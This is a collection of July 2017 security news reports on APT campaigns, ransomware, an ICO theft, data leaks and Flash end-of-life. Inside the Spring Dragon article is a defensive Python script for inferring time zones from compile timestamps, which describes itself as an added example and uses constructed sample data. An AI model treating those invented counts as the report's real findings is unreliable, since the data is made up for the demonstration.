“I don’t know it if it’s just some bored person or someone with perverse goals,” Wardle said. “If some bored teenager is spying on me, that would still be very emotionally traumatic. If it’s turning on the webcam, that’s for perverse reasons.”

The researcher believes that Fruitfly was therefore abandoned by its creators, but the victims are still exposed to anyone who is able to impersonate a C&C server included in the list of hardcoded domains.

Wardle reported his findings to law enforcement and all hardcoded domains are no longer available to avoid abuses.

Wardle developed a set of tools for his investigation, such as BlockBlock for detecting persistence mechanisms and OverSight for alerting on webcam activation.

Don’t miss the Wardle speech at the Black Hat Security Conference in Las Vegas, it is titled Offensive Malware Analysis: Dissecting OSX/Fruitfly via a custom C&C Server.


Veritaseum – Hacker Steals $8.4 Million in Ethereum, for the second time during the ICO
26.7.2017 securityaffairs Incident

Veritaseum – An unknown hacker has stolen nearly $8.4 Million worth of Ethereum cryptocurrency, for the second time during the ICO.
A major cyber heist has made the headlines: an unknown hacker has stolen nearly $8.4 Million worth of Ethereum cryptocurrency from the Veritaseum Initial Coin Offering (ICO).

This is the fourth Ethereum cyber heist this month, and the second time hackers have exploited an ICO to steal the precious cryptocurrency.

Last week, a hacker stole $7 Million in Ethereum from CoinDash in just 3 minutes after the ICO launch, he tricked investors into sending ETH to the wrong address.


A few days ago, a hacker stole nearly $32 Million worth of Ethereum from wallet accounts by exploiting a critical flaw in Parity’s Ethereum Wallet software. A third cyber heist of $1 Million worth of Ether and Bitcoins affected the currency exchange Bithumb earlier in June.

Back to the present: Veritaseum confirmed the security breach, in which a hacker stole $8.4 Million in Ether (ETH) from its ICO on July 23. The investigation is ongoing, and it is still unclear which vulnerability was exploited by the hacker.

“We were hacked, possibly by a group. The hack seemed to be very sophisticated, but there’s at least one corporate partner that may have dropped the ball and be liable. We will let the lawyers sort that out if it goes that far.” said Veritaseum founder Reggie Middleton.

“The hacker(s) made away with $8.4M worth of tokens, and dumped all of them within a few hours into a heavy cacophony of demand. This is without the public knowing anything about our last traction.

I would like to make it known that we had the option to fork VERI, but chose not to. At the end of the day, the amount stolen was minuscule (less than 00.07%) although the dollar amount was quite material.”

Middleton speculates that an unnamed third-party company may be responsible for the attack. According to Middleton, due to the high demand of the VERI tokens during the ICO held over the weekend, the hacker first managed to steal those tokens and then immediately sold them to other buyers “within a few hours.”

The hacker first dumped the stolen funds into two separate Ethereum wallets and then moved them to other accounts.

The hacker stole 37,000 VERI tokens out of 100 Million in the cyber heist, which means that the event will not impact ICO investors.

“There are 100M tokens issued; the hackers stole about 37k. As I said, it is quite disconcerting, but it is not the end [of] the world. In the scheme of things, this is small,” added Middleton.
“The tokens were stolen from me, not the token buyers. I am not downplaying the seriousness of the heist either, but I am looking at the heist for what it is. A company that we use was compromised, the vulnerability was closed, and we are investigating whether we should move against that company or not.”


Experts detailed the new Operation Wilted Tulip campaign of the CopyKittens APT
26.7.2017 securityaffairs APT

Researchers from ClearSky and Trend Micro uncovered a new massive cyber espionage campaign conducted by CopyKittens dubbed ‘Operation Wilted Tulip’
A joint investigation conducted by experts from the Israeli cyber-intelligence firm ClearSky and Trend Micro uncovered a new massive cyber espionage campaign, dubbed ‘Operation Wilted Tulip’, conducted by the Iran-linked APT group CopyKittens (aka Rocket Kittens).


The hackers targeted government and academic organizations in various countries; according to the experts, the group has been active since at least 2013.

In 2015, ClearSky detected new activity from the Rocket Kitten APT group against 550 targets, most of which were located in the Middle East.

The CopyKittens hackers targeted organisations and individuals in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.

The joint report published by ClearSky and Trend Micro includes details on Operation Wilted Tulip and describes the TTPs (tactics, techniques, and procedures) adopted by the Rocket Kittens APT group.
“CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a files compression console program. The group also uses Matryoshka v1, a self-developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with similar functionality. The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” states the report.

“Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.”

The hackers used both spear phishing attacks and watering holes to compromise target systems.

CopyKittens compromised websites of media outlets and organizations to deliver its malware. Among the websites compromised by the hackers to conduct watering hole attacks are The Jerusalem Post, Maariv news and the IDF Disabled Veterans Organization.

Below is the full list of methods used by CopyKittens in its campaigns.

Watering hole attacks – inserting malicious JavaScript code into breached strategic websites.
Web based exploitation – emailing links to websites built by the attackers and containing known exploits.
Malicious documents – email attachments containing weaponized Microsoft Office documents.
Fake social media entities – fake personal and organizational Facebook pages are used for interaction with targets and for information gathering.
Web hacking – Havij, Acunetix and sqlmap are used to detect and exploit internet-facing web servers.
The hackers used multiple tools and malware to infect targets, including both custom malicious code and commercial solutions like Cobalt Strike.


Adobe Flash end of life announced for 2020. Start thinking about the migration
26.7.2017 securityaffairs IT

Adobe announced Flash end-of-life by 2020. Apple, Facebook, Google, Microsoft and Mozilla plan to stop supporting the Adobe Flash Media Player in 2020.
It’s official: Adobe will kill Flash by 2020. The company will stop providing support for the popular browser plugin by the end of that year.

“Given this progress, and in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.” states Adobe’s announcement.

Open standards like HTML5, WebGL, and WebAssembly have matured enough over the past years to replace all the features today implemented by Adobe Flash.

Starting in 2020, the company will no longer provide support for the plugin on major browsers, including Chrome, Firefox, Internet Explorer and Edge.

“If the site continues to use Flash, and you give the site permission to run Flash, it will work through the end of 2020.” wrote Google. “We’re supportive of Adobe’s announcement today, and we look forward to working with everyone to make the web even better.”

“To provide guidance for site authors and users that continue to rely on Flash, Mozilla has updated its published roadmap for Flash in Firefox. Starting next month, users will choose which websites are able to run the Flash plugin.” states Mozilla. “Flash will be disabled by default for most users in 2019, and only users running the Firefox Extended Support Release (ESR) will be able to continue using Flash through the final end-of-life at the end of 2020. In order to preserve user security, once Flash is no longer supported by Adobe security patches, no version of Firefox will load the plugin.”

According to Google, Flash usage had gone down from 80% to 17%.


In a similar way, Microsoft also announced the end of support for Flash in its products.

“We will phase out Flash from Microsoft Edge and Internet Explorer, culminating in the removal of Flash from Windows entirely by the end of 2020. This process began already for Microsoft Edge with Click-to-Run for Flash in the Windows 10 Creators Update.” states Microsoft.

Facebook also announced that it will shut off Flash games by the end of 2020.

Administrators of websites that rely on Flash are being encouraged to start planning the migration to new technologies.

From a cyber security perspective, the Adobe Flash end of life is good news, because Flash is one of the most exploited pieces of software in recent cyber attacks.


32M Becomes First-Ever Company to Implant Micro-Chips in Employees
25.7.2017 thehackernews Privacy

Biohacking could be the next big thing in this smart world.
Over two years ago, a hacker implanted a small NFC chip in his left hand right between his thumb and his pointer finger and hacked Android smartphones and bypassed almost all security measures, demonstrating the risks of Biohacking.
At the end of the same year, another hacker implanted a small NFC chip with the private key to his Bitcoin wallet under his skin, making him able to buy groceries or transfer money between bank accounts by just waving his hand.
And this is soon going to be a reality, at least in one tech company in Wisconsin.
Marketing solution provider Three Square Market (32M) has announced that it has partnered with Swedish biohacking firm BioHax International to offer implanted microchips to its employees on 1st August, according to the company's website.
Although the programme is optional, the company expects more than 50 of its employees to undergo the biohacking procedure.
Like previous bio hacks, the chips will be implanted underneath the skin between the thumb and forefinger, and will also use near-field communications (NFC) — the same technology that makes contactless credit cards and mobile payments possible — along with radio-frequency identification (RFID).

According to the company, the implanted chips would allow its employees to log into their office computers, pay for food and drink from office vending machines, open doors and use the copy machine, among other purposes.
The company CEO has also confirmed that 'there's no GPS tracking at all.'
"We foresee the use of RFID technology to drive everything from making purchases in our office break room market, opening doors, use of copy machines, logging into our office computers, unlocking phones, sharing business cards, storing medical/health information, and used as payment at other RFID terminals," 32M chief executive Todd Westby said.
"Eventually, this technology will become standardised allowing you to use this as your passport, public transit, all purchasing opportunities, etc."
Interested employees will be chipped at the 32M inaugural "chip party" on 1st August at the company's headquarters in River Falls, Wisconsin.
Three Square Market is considered a leader in micro market technology; it designs mini-convenience stores using self-checkout kiosks (vending machines), often found in large companies.
The company has more than 2,000 kiosks in nearly 20 different countries, and it operates over 6,000 kiosks in TurnKey Corrections, the firm's corrections industry business.
While biometric information and technology are experiencing an increase in popularity, they also raise widespread concerns around the safety and privacy of the people adopting them.
Hackers could turn technology meant to make life easier for the public against the public itself, and one should not forget that as technology advances, the techniques used by cyber criminals also improve.


One in Ten U.S. Organizations Hit by WannaCry: Study

25.7.2017 securityweek  Ransomware

A recent survey discovered that the vast majority of organizations in the United States weren’t prepared for the WannaCry ransomware attack, but just one in ten ended up being infected by the malware.

WannaCry stormed the world in mid-May by leveraging a previously patched exploit called EternalBlue, which hacker group Shadow Brokers allegedly stole from the NSA-linked Equation Group. The ransomware mostly infected Windows 7 computers that hadn’t been patched in due time, and also revealed the destructive impact of a global outbreak. NotPetya confirmed the risk in late June.

According to a survey (PDF) from software lifecycle automation solutions provider 1E, 86% of the organizations in the U.S. had to “divert significant resources” to safeguard themselves during the WannaCry attack. Only 14% of the respondents revealed their organization was prepared for such an attack.

The study also shows that 86% of organizations don’t apply patches immediately after they are released, thus leaving endpoints and entire networks exposed to such attacks. While 14% of respondents said they apply patches immediately, 36% apply them within one week after release, and 27% need up to a month for that, while 23% don’t apply patches within a month after release.

It’s no surprise that 70% of the 400+ U.S. IT professionals responding to the survey said they had to work over at least one weekend as a result of the WannaCry attack, while one in ten admitted to having worked three or more weekends.

The fact that most organizations aren’t prepared for attacks that exploit already patched vulnerabilities is also reflected in the percentage of respondents who said they already migrated to Windows 10: 11%. While 53% said they are currently migrating to Microsoft’s latest platform iteration, 28% said they are planning on doing so this year or the next, while 8% said they had no such plan.

Following the WannaCry incident, awareness appears to have increased regarding the benefits of applying the necessary patches in due time. 71% of respondents said their intent to stay updated has improved (the percentage rises to 87% when infected organizations are concerned), while 74% said “the experience of reacting to WannaCry has left them better prepared for future threats.”

However, 87% of organizations aren’t taking steps to accelerate their migration to Windows 10, despite the looming risks. Furthermore, 73% of respondents said management didn’t make more resources available to IT to help it apply patches faster and/or accelerate its OS migration.

“There is a growing concern that we have entered an era in which this kind of attack becomes the new normal. It's more important than ever that organizations stay current and ensure that software is kept up-to-date and fully patched at all times. WannaCry was a huge wakeup call that elevated security concerns to boardroom level -- IT teams can't afford to leave their organizations exposed,” Sumir Karayi, founder and CEO of 1E, said.


Researcher Analyzes Psychology of Ransomware Splash Screens

25.7.2017 securityweek  Ransomware

The 'splash screens' of seventy-six different types of ransomware have been analyzed by a cyber-psychologist from De Montfort University. Commissioned by SentinelOne, the subsequent report 'Exploring the Psychological Mechanisms used in Ransomware Splash Screens' (PDF) is designed to reveal how social engineering tactics are used by cyber criminals to manipulate and elicit payments from individuals.

All successful ransomware infections have one common factor -- an explanatory instruction screen to describe what has happened and explain how the victims can recover their files through the payment of a ransom. It is these explanatory screens that comprise the 'splash screens' that are analyzed.

The content and design of the splash screens varies widely but they all have the same intention: to ensure that the victim pays up. "The argument presented in the current report," writes the author, Dr Lee Hadlington, "suggests that these tactics are closely aligned to the concept of social engineering, working on aspects of fear, urgency, scarcity, authority and, in some cases, humor."

He admits that it isn't clear whether the use of archetypal social engineering methods is by design or imitation; but they do occur. The primary social engineering techniques are 'urgency' ('pay within a short deadline or the fee will double'); fear ('or you will lose all of your personal files'); authority ('you must do what I say'); and -- sometimes -- approachability ('email me if you need further instructions').

Hadlington says, "We know that psychology plays a significant part in cyber crime -- what's been most interesting from this study is uncovering the various ways that key social engineering techniques are used to intimidate or influence victims. With ransomware on the rise, it's important that we improve our understanding of this aspect of the attack and how language, imagery and other aspects of the initial ransom demand are used to coerce victims."

While the analysis of the splash screens is interesting and thorough, it does not explain why it is important to understand a technique (social engineering) that is already well-understood and thoroughly analyzed. Furthermore, there is no ability to study the effectiveness of the social engineering techniques (which would at least benefit social engineering research if not ransomware research).

One difficulty is that we do not fully understand the underlying purpose of this social engineering. David Harley, a senior research fellow with ESET, has his own thoughts. "As I see it, the importance of social engineering in notifications lies mostly in these areas," he told SecurityWeek in an emailed comment: "[firstly] pressuring the victim into taking the desirable action of paying up more or less immediately, rather than exploring other options. Especially if there's a risk that grey- or whitehat researchers will come up with a way of recovering data without paying.

"[Secondly] pressuring the victim into paying for recovery of data that aren't actually lost; and [thirdly] pressuring the victim into paying for recovery of data for which the criminals don't actually have a recovery mechanism, before some interfering security researcher points out that paying up doesn't achieve anything."

The big weakness in the report is the inability to measure the effectiveness of the splash screens. This is something that the author admits: "Not all splash screens are the same -- there is a distinct difference in terms of the level of sophistication of mechanisms used to gain payment, presentation of the splash screens and provision of information for further contact. However, there is no further data to explore how such differences map to their success in terms of eliciting payment."

Tony Rowan, a director at SentinelOne, accepts the difficulty in measuring the success of the different splash screens. "This is an interesting area," he told SecurityWeek, "and we have looked for data to use in a correlation exercise. At this stage, the payment data is too disparate and unverifiable to be useful for a correlation exercise, though this is an area we will continue to look at."

But as Harley adds, "As someone with a background in social sciences, I find these questions rather interesting; but from an academic point of view, without subjective data to draw on which aren't present in this study, they're just conjecture."

Without the ability to measure the effectiveness of the different splash screens, there can be no serious conclusions from the analysis. This is admitted: "By expanding the current work with more empirical research, a clearer understanding of why certain ransomware splash screens are more successful at eliciting a payment over others could be obtained," writes Hadlington. "Such information could in turn be used to provide effective mitigation techniques for such attacks, as well as giving both investigators and victims a clearer pathway for help and advice in the event of an attack."

But even then, it is not at all clear how understanding the efficiency of different social engineering techniques in splash screens could help provide 'effective mitigation techniques for such attacks'. It has to be said that this research will be of more interest to students of social engineering than to students of cyber security.


Misconfigured Google Groups Expose Sensitive Data

25.7.2017 securityweek IT

Researchers at cloud security firm RedLock believe hundreds of organizations may be exposing highly sensitive information by failing to properly configure Google Groups.

Google Groups is a service that allows users to create and take part in online forums and email-based groups. When a group is configured, its creator has to set sharing options for “Outside this domain - access to groups” to either “Private” or “Public on the Internet.”

RedLock’s Cloud Security Intelligence (CSI) team noticed that many Google Groups for Business users have allowed access to their groups from the Internet, and in some cases the configuration error has resulted in the exposure of sensitive information.

Researchers have found names, email and home addresses, employee salary data, sales pipeline data, and customer passwords in the exposed groups.

“We only looked for a sample of such cases and found dozens,” RedLock told SecurityWeek. “Extending that, there are likely hundreds of companies affected by this misconfiguration.”

According to RedLock, the list of affected firms includes IBM’s The Weather Company, which operates weather.com, intellicast.com and Weather Underground; Fusion Media Group, which owns Gizmodo, The Onion, Jezebel and Lifehacker; video ad platform SpotX, which delivers ads to 600 million people worldwide every month; and cloud-based helpdesk support provider Freshworks, whose software is used by more than 100,000 companies.

Organizations using Google Groups have been advised to immediately check their settings to ensure that access is set to private in order to avoid leaking sensitive data.


“Simple misconfiguration errors – whether in SaaS applications or cloud infrastructure – can have potentially devastating effects,” said Varun Badhwar, CEO and co-founder of RedLock.

Badhwar pointed to the recent incidents involving Deep Root Analytics, WWE and Booz Allen Hamilton as examples of the impact such simple errors can have.

“This new issue that the RedLock CSI team discovered has led to the exposure of sensitive information from hundreds of companies simply through the click of a button,” Badhwar explained. “In today’s environment, it’s imperative that every organization take steps to educate employees on security best practices and leverage tools that can automate the process of securing applications, workloads and other systems. In the cloud, for example, a resource only exists for 127 minutes on average – there’s no way for IT teams alone to keep up with this rapid rate of change.”


Spring Dragon APT used more than 600 Malware samples in different attacks
25.7.2017 securityaffairs APT

The threat actor behind Spring Dragon APT has been developing and updating its wide range of tools throughout the years, new attacks reported in South Asia.
According to a new report published by Kaspersky Lab, the China-linked APT group Spring Dragon (aka Lotus Blossom, Elise, and Esile) has used more than 600 malware samples in its attacks over the past years.
The Spring Dragon APT group is a state-sponsored group that has been around since at least 2012, but further evidence collected by the researchers suggests that it may have been active since 2007.

The APT group focused its cyber espionage campaigns on military and government organizations in Southeast Asia.
In June 2015, Trend Micro published a report on a targeted attack campaign by the group that hit organizations in various countries in the Southeast Asian region. The experts speculated on the involvement of state-sponsored hackers due to the nature of the stolen information.

“The Esile targeted attack campaign targeting various countries in the Southeast Asian region has been discussed in the media recently. This campaign – which was referred to by other researchers as Lotus Blossom – is believed to be the work of a nation-state actor due to the nature of the stolen information, which is more valuable to countries than either private companies or cybercriminals.” wrote Trend Micro.

In October 2015, the Lotus Blossom group launched a new espionage campaign using fake invitations to Palo Alto Networks’ Cybersecurity Summit held in Jakarta, on November 3.

Back to the present, researchers from Kaspersky Lab were informed by a research partner in Taiwan of a new wave of attacks powered by the APT group.

“Information about the new attacks arrived from a research partner in Taiwan and we decided to review the actor’s tools, techniques and activities.” states the analysis from Kaspersky Lab.

“Using Kaspersky Lab telemetry data we detected the malware in attacks against some high-profile organizations around the South China Sea.”

The hackers also targeted political parties, educational institutions, and companies in the telecommunications industry.

Most infections were observed in countries around the South China Sea, including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia, and Thailand.


Spring Dragon is known for spear phishing and watering hole attacks; malware researchers at Kaspersky Lab collected a large set of more than 600 malware samples used in different attacks.
The APT group has a huge cyber arsenal, and it has been developing and updating its range of tools across the years. The hackers have various backdoor modules with unique characteristics and functionalities, and the group manages a large Command and Control infrastructure that includes more than 200 unique IP addresses and C&C domains.

Most C&C servers used by Spring Dragon are located in Hong Kong and the United States, other servers have also been found in Germany, China and Japan.

“The large number of samples which we have managed to collect have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system. This is designed to make detection more difficult.” continues the analysis.

“All the backdoor modules in the APT’s toolset are capable of downloading more files onto the victim’s machine, uploading files to the attacker’s servers, and also executing any executable file or any command on the victim’s machine. These functionalities enable the attackers to undertake different malicious activities on the victim’s machine.”

The analysis of the malware compilation timestamps revealed that the attackers might be in the GMT+8 time zone, the same as countries such as China, Indonesia, Malaysia, Mongolia, Singapore, Taiwan, the Philippines and Western Australia.

Another interesting finding from the analysis is that the malware was compiled by two different groups, one of which may be in Europe.

“It also suggests that either there is a second group working another shift in the same time zone or the attackers are cross-continental and there is another group, possibly in Europe. The uneven distribution of timestamps (low activity around 10am, 7-8pm UTC) suggests that the attackers didn’t change the timestamps to random or constant values and they might be real.” states the analysis.
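The compile-timestamp reasoning above can be reproduced on one's own sample set. The script below is an added illustration, not Kaspersky's code: it builds an hour-of-day histogram in UTC, ranks candidate UTC offsets by how much of the activity they place inside an assumed 09:00-18:00 working day, and applies the "uneven distribution" heuristic from the quoted passage to flag timestamps that look randomised (flat) or constant (one dominant hour). The working-day window, the thresholds and the sample timestamps are all constructed assumptions.

```python
"""Compile-timestamp time-zone inference (added example, not Kaspersky's code).

Given PE compile timestamps (POSIX seconds, as stored in the PE header's
TimeDateStamp field), build an hour-of-day histogram in UTC, rank candidate
UTC offsets by how much activity they place inside an assumed working day,
and apply the "uneven distribution" heuristic to judge whether the stamps
look genuine. Working hours, thresholds and sample data are assumptions.
"""
from collections import Counter
from datetime import datetime, timezone

WORK_HOURS = range(9, 18)  # assumed local working day, 09:00-17:59

# Constructed sample: how many samples were compiled in each UTC hour.
# The mass sits at UTC 01-10 with a dip at UTC 04, i.e. 09-18 local with a
# lunch lull for a UTC+8 developer; a few stragglers fall outside that window.
_SAMPLE_COUNTS = {23: 2, 0: 3, 1: 5, 2: 9, 3: 12, 4: 4, 5: 11,
                  6: 13, 7: 10, 8: 8, 9: 6, 10: 3, 11: 2}


def sample_timestamps():
    """Expand the constructed counts into concrete POSIX timestamps."""
    stamps = []
    for hour, n in _SAMPLE_COUNTS.items():
        for day in range(n):  # spread the samples over different days
            dt = datetime(2017, 3, 1 + day, hour, 30, tzinfo=timezone.utc)
            stamps.append(int(dt.timestamp()))
    return stamps


def hour_histogram(timestamps):
    """Count samples per UTC hour of day; returns a 24-element list."""
    counts = Counter(datetime.fromtimestamp(ts, tz=timezone.utc).hour
                     for ts in timestamps)
    return [counts.get(h, 0) for h in range(24)]


def working_share(hist, offset):
    """Fraction of samples inside WORK_HOURS if the author sits at UTC+offset."""
    total = sum(hist)
    if total == 0:
        return 0.0
    inside = sum(n for h, n in enumerate(hist) if (h + offset) % 24 in WORK_HOURS)
    return inside / total


def mean_local_hour(hist, offset):
    """Average local hour of activity under UTC+offset (used only to break ties)."""
    total = sum(hist)
    if total == 0:
        return 12.0
    return sum(((h + offset) % 24) * n for h, n in enumerate(hist)) / total


def infer_offsets(hist, top=3):
    """UTC offsets ranked by working-day fit; ties go to the offset whose
    activity is centred closest to mid-afternoon (13:30 local)."""
    candidates = range(-12, 15)  # UTC-12 .. UTC+14
    ranked = sorted(candidates,
                    key=lambda off: (-working_share(hist, off),
                                     abs(mean_local_hour(hist, off) - 13.5)))
    return ranked[:top]


def timestamp_quality(hist, max_cv=0.35, constant_share=0.9):
    """Apply the quoted heuristic: a flat distribution is what randomised
    stamps would give, one dominant hour is what a constant fill would give,
    and an uneven daily rhythm is consistent with real build times."""
    total = sum(hist)
    if total == 0:
        return "empty"
    if max(hist) / total >= constant_share:
        return "constant"
    mean = total / 24
    stddev = (sum((n - mean) ** 2 for n in hist) / 24) ** 0.5
    return "uniform" if stddev / mean <= max_cv else "plausible"


if __name__ == "__main__":
    hist = hour_histogram(sample_timestamps())
    for h, n in enumerate(hist):
        print(f"UTC {h:02d}:00 {'#' * n}")
    print("timestamps look:", timestamp_quality(hist))
    for off in infer_offsets(hist):
        print(f"UTC{off:+d}: {working_share(hist, off):.0%} of builds in working hours")
```

On the constructed data the best fit is UTC+8, with UTC+7 and UTC+9 close behind, which is why a histogram alone narrows the candidates to a band of neighbouring zones rather than a single country.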

“The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this.”


SLocker source code leaked online for free, a gift for crooks and hackers
24.7.2017 securityaffairs Ransomware

The SLocker source code leaked online, it is one of the oldest mobile lock screen and file-encrypting ransomware.
The source code of the SLocker Android malware, one of the most popular Android ransomware families, has been leaked online for free, allowing crooks to develop their own variant of the threat.

SLocker was first spotted in 2015; it is the first ransomware to encrypt Android files.

The SLocker source code has been leaked on GitHub by a user with the online moniker “fs0c1ety,” who is inviting everyone to contribute to the code and submit bug reports.

“The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.” states fs0c1ety.

“All contributions are welcome, from code to documentation to design suggestions to bug reports. Please use GitHub to its fullest– contribute Pull Requests, contribute tutorials or other wiki content– whatever you have to offer, we can use it!”


SLocker, aka Simple Locker, is a mobile ransomware that locks victims’ mobile devices and requests the payment of a ransom to unlock them.

The malware impersonates law enforcement agencies to convince victims to pay the ransom; it infected thousands of Android devices in 2016.

According to the experts, more than 400 new variants of the SLocker ransomware were observed in the wild in May, and in the same month researchers at Trend Micro found a variant mimicking the WannaCry GUI.

“This particular SLocker variant is notable for being an Android file-encrypting ransomware, and the first mobile ransomware to capitalize on the success of the previous WannaCry outbreak.” reads the analysis published by Trend Micro.

“While this SLocker variant is notable for being able to encrypt files on mobile, it was quite short-lived. Shortly after details about the ransomware surfaced, decrypt tools were published. And before long, more variants were found. Five days after its initial detection, a suspect supposedly responsible for the ransomware was arrested by the Chinese police. Luckily, due to the limited transmission channels (it was spread mostly through forums like QQ groups and Bulletin Board Systems), the number of victims was very low.”

Once it has infected the mobile device, SLocker runs silently in the background and encrypts any kind of file on the smartphone, including images, documents, and videos.

The ransomware is also able to hijack the mobile device, making it impossible for the owner to access it.

The availability of the SLocker source code will likely increase the number of samples detected in the wild in the coming weeks.


Sweden Accidentally Leaks Personal Details of Nearly All Citizens
24.7.2017 thehackernews  BigBrothers

Another day, Another data breach!
This time sensitive and personal data of millions of transporters in Sweden, along with the nation's military secrets, have been exposed, putting every individual's as well as national security at risk.
Who exposed the sensitive data? The Swedish government itself.
Swedish media is reporting a massive data breach at the Swedish Transport Agency (Transportstyrelsen) after the agency mishandled an outsourcing deal with IBM, which led to the leak of private data about every vehicle in the country, including those used by both police and military.
The data breach exposed the names, photos and home addresses of millions of Swedish citizens, including fighter pilots of the Swedish air force, members of the military's most secretive units, police suspects, people under the witness relocation programme, the weight capacity of all roads and bridges, and much more.
The incident is believed to be one of the worst government information security disasters ever.
Here's what happened and how:
In 2015, the Swedish Transport Agency handed IBM an IT maintenance contract to manage its databases and networks.
However, the Swedish Transport Agency uploaded IBM's entire database onto cloud servers, which covered details on every vehicle in the country, including police and military registrations, and individuals on witness protection programs.
The transport agency then emailed the entire database in messages to marketers that subscribe to it.
And what’s terrible is that the messages were sent in clear text.
When the error was discovered, the transport agency merely thought of sending a new list in another email, asking the subscribers to delete the old list themselves.
If you think the scandal ends there, you are wrong. The outsourcing deal gave IBM staff outside Sweden access to the Swedish transport agency's systems without undergoing proper security clearance checks.
IBM administrators in the Czech Republic were also given full access to all data and logs, according to Swedish newspaper Dagens Nyheter (DN), which analysed the Säpo investigation documents.
According to Pirate Party founder and now head of privacy at VPN provider Private Internet Access Rick Falkvinge, who brought the details of this scandal to light, the incident "exposed and leaked every conceivable top secret database: fighter pilots, SEAL team operators, police suspects, people under witness relocation."
Tons of Sensitive Info Exposed about Both Individuals and Nation's Critical Infrastructures
According to Falkvinge, the leak exposed:
The weight capacity of all roads as well as bridges (which is crucial for warfare, and gives a good idea of which roads are intended to be used as wartime airfields).
Names, photos, and home addresses of fighter pilots in the Air Force.
Names, photos, and home addresses of everybody in a police register, which are believed to be classified.
Names, photos, and residential addresses of all operators in the military's most secret units that are equivalent to the SAS or SEAL teams.
Names, photos, and addresses of everybody in a witness relocation program, who have been given a protected identity for some reason.
Type, model, weight, and any defects in all government and military vehicles, including their operator, which reveals a great deal about the structure of military support units.
Although the data breach happened in 2015, the Swedish Secret Service discovered it in 2016 and started investigating the incident, which led to the firing of STA director-general Maria Ågren in January 2017.
Ågren was also fined half a month's pay (70,000 Swedish krona, which equals $8,500) after she was found guilty of being "careless with secret information," according to the publication.
What's the worrying part? The leaked database may not be secured until the fall, said the agency's new director-general Jonas Bjelfvenstam. The investigation into the scope of the leak is still ongoing.


Google Rolls-Out Play Protect Services for Android

24.7.2017 securityweek Android

After introducing the product at the Google I/O conference in May, Google has now made its Play Protect security services available to all Android users.

Play Protect was designed to combine various Android security services, including Verify Apps and Bouncer, in a single suite integrated into all devices with Google Play. This, Google says, will let users benefit from comprehensive protection capabilities without having to search for and download multiple applications on their devices.

The Internet giant already performs tens of billions of application scans every day in an effort to protect the 2 billion active Android devices around the world. According to Google, it can identify risks, discover potentially harmful applications, prevent them from compromising devices, and even remove them from already infected devices when necessary.

Play Protect was designed to scan all applications in Google Play before they are downloaded, but also periodically all apps installed on connected devices. Thus, it can detect harmful behavior even in applications that haven’t been installed via Google Play.

In fact, Play Protect scans and monitors apps from third-party sources continuously, meaning it could detect malicious activities even if they are performed long after the app was installed (some programs hide their behavior by acting normally in the beginning). Potentially harmful apps are disabled and the user is alerted.

“Google Play Protect continuously works to keep your device, data and apps safe. It actively scans your device and is constantly improving to make sure you have the latest in mobile security. Your device is automatically scanned around the clock, so you can rest easy,” Google claims.

A Find My Device service (previously known as Android Device Manager) is also part of Play Protect, allowing users to easily locate, lock, or wipe phones, tablets, and other types of devices that have been lost or stolen. Safe Browsing, the feature that keeps users protected when surfing the web via Chrome on Android, is also included in the suite.

Users looking to customize the Play Protect options on their devices should head to Settings > Google > Security > Play Protect (previously Verify Apps). Play Protect should be available on all devices running Google Play services 11 or above.

Despite Google’s continuous focus on improving Android safety, malicious apps still manage to slip into Google Play and infect millions. To circumvent the company’s protections, cybercriminals hide their malware in fake system updates, mobile games, utility programs, and fake versions of popular streaming apps.


Threat Hunters Analyze Trends in Destructive Cyber-Attacks

24.7.2017 securityweek Cyber

The three primary trends in the incidence of destructive cyber-attacks are that they are increasing; they are usually state-sponsored; and they do not, apart from a few rare occurrences, involve anything more than basic tools. Potentially more concerning for private industry, however, is a lack of concern over what, in kinetic warfare, would be termed 'collateral damage'.

Cybereason, a Boston MA-based threat hunting firm, has analyzed destructive cyber-attacks from the 1982 software-instigated explosion in a Siberian pipeline to the recent NotPetya and Industroyer attacks. Cybereason's conclusions are not reassuring for industry.

A graph of attack sophistication over time shows two primary characteristics. The majority of attacks have occurred since 2012, and the majority of attacks are (relatively) unsophisticated.

The three sophisticated attacks are a 1998 US military attack against Serbian air defense systems; the Stuxnet attack against the Iranian nuclear program in 2010; and the CrashOverride/Industroyer attack against the Ukrainian power grid in 2016. All three have one common characteristic: they are thought to be nation-state attacks against critical or military infrastructure.

Destructive Cyber Attack

A clear majority of unsophisticated attacks are targeted against private industry. Cybereason sees little sign of this being contained by government interaction, and fears that it is likely to increase: it is, in effect, uncontrolled cyber war in all but official classification.

Some of these attacks are likely to have been nation-state actors testing out their cyber-weapons. The 2015 attack against the French television station TV5Monde is thought to be one: the UK intelligence community concluded that it was likely an attempt to test forms of cyber-weaponry as part of an increasingly aggressive posture by Russia, acting through APT28/Fancy Bear.

Other attacks are purely political, including several attacks by Iranian hackers against Saudi oil production. Some could be considered 'national' political/revenge, such as the North Korean Dark Seoul attack against South Korean television and banking in 2013, and against Sony Pictures in 2014.

Cybereason argues that government is unable -- perhaps unwilling -- to counter this threat.

"There is no incentive for nations to stop this behavior," Cybereason explains in its report (PDF). "They can signal displeasure, retaliate for another's actions, or conduct disruptive covert operations with impunity. The relative ease in striking internationally that the Internet provides combined with the comparative lack of retribution has created an environment where nations will continue to experiment and grow increasingly bold in their attacks."

